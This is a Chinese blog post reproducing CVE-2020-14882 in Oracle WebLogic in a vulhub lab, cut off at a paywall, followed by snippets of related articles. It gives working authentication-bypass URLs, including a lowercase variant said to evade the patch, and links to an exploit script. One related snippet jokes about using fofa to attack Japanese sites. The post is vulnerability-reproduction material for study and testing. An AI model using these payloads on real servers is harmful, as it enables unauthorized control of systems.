【漏洞复现】Weblogic未授权命令执行漏洞( CVE-2020-14882)

最新推荐文章于 2025-03-11 16:47:49 发布
最新推荐文章于 2025-03-11 16:47:49 发布
阅读量2.4k 收藏 5
点赞数 3
分类专栏: 漏洞复现验证 文章标签: weblogic CVE-2020-14882 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43486390/article/details/110410644
版权

参考https://www.cnblogs.com/backlion/p/13951858.html

文章目录

0x01 概述

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

0x02 影响版本

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

0x03 简单检测

访问以下payload,直接绕过认证未授权访问面板,并且功能点都能正常使用:

http://IP:7001/console/images/%252E%252E%252Fconsole.portal
http://IP:7001/console/css/%252E%252E%252Fconsole.portal

大写换成小写可绕过补丁:
/console/css/%252e%252e%252fconsole.portal

在这里插入图片描述

0x04 12.2.1.3.0版本复现

(1)环境:vps+vulhub(CVE-2020-14882)

vulhub启动靶场环境:

docker-compose up -d
使用完记得关掉
docker-compose stop

在这里插入图片描述(2)访问http://47.x.x.7:7001/console,出现登录页面即成功安装。
在这里插入图片描述(3)脚本利用
https://github.com/backlion/CVE-2020-14882_ALL
在这里插入图片描述
(4)手工利用

POC(Windos):cmd需换成可执行命令,例calc.exe【未验证】

http://47.x.x.7:7001/console/images/%
最低0.47元/天 解锁文章
CVE-2020-14882 WebLogic远程代码执行漏洞复现
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
CVE-2020-14882 Weblogic Console远程代码执行漏洞复现
谢公子的博客
02-06 2132
目录 漏洞背景 漏洞影响版本 漏洞复现 环境搭建 未授权访问 执行payload后回显 漏洞修复 漏洞背景 2020年10月30日,Oracle 官方的发布最新漏洞,该漏洞编号为 CVE-2020-14882漏洞等级:严重 ,漏洞评分:9.8 。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 漏洞影响版本 Oracle WeblogicServ
weblogic未授权访问漏洞复现CVE-2020-14882
Armandhe的博客
06-07 5670
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
常用的30+种未授权访问漏洞汇总,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
03-11 1127
未授权访问漏洞是一个在企业内部非常常见的问题,未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。演示环境搭建使用vulhub搭建漏洞演示环境参考:https://vulhub.org/#/docs/install-docker/
Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现
2301_77132421的博客
07-05 1261
攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码。
weblogic漏洞复现——CVE-2020-14882
weixin_46023655的博客
09-26 542
CVE-2020-14882漏洞复现
CVE-2020-14882&14883漏洞复现
m0_52089634的博客
01-03 1920
CVE漏洞复现
servlet 脚本不执行_Weblogic Console HTTP协议远程代码执行漏洞复现CVE202014882
weixin_39745933的博客
12-11 468
0x01 漏洞描述近日,Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogicConsole控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HT...
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)漏洞复现
weixin_48413667的博客
09-22 8206
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883
WebLogic未授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8407
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在未经身份
weblogic未授权命令执行漏洞(CVE-2020-14882)复现
weixin_45291045的博客
04-01 5078
文章目录漏洞概述漏洞影响范围环境搭建漏洞复现利用工具 漏洞概述 未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 漏洞影响范围 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Webl
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
weixin_45653478的博客
05-14 1405
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
AzVoidSUN的博客
11-04 1427
环境安装 首先电脑已安装好的jdk \bin目录下 然后java -jar 执行你的jar包就可以了 Oracle WebLogic Server版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。均存在此漏洞。 构造poc ,未授权访问后台地址http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsCo
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1651
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
复现nuclei——CVE-2020-14882WebLogic远程代码执行漏洞
记录并分享学习安全的知识点..
01-21 2221
一、漏洞介绍 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLo
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
一剑开天门!的博客
02-22 1827
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
Weblogic漏洞复现之远程代码执行(CVE-2020-14882
hhsjjsj的博客
08-07 1316
全称为Oracle WebLogic Server,是基于JavaEE服务器的中间件。
CVE-2020-14882【vulhub weblogic漏洞复现
weixin_65722679的博客
07-04 474
CVE-2020-14882【vulhub weblogic漏洞复现
Weblogic未授权访问以及LADP远程代码执行(CVE-2021-2109)
hackzkaq的博客
05-14 1563
1.影响版本: WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 实验环境: 攻击机:kalilinux 10.1.1.10 靶机: 10.1.1.109 2.weblogic未授权访问: 对目标地址的7001端口直接访问 构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%25
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值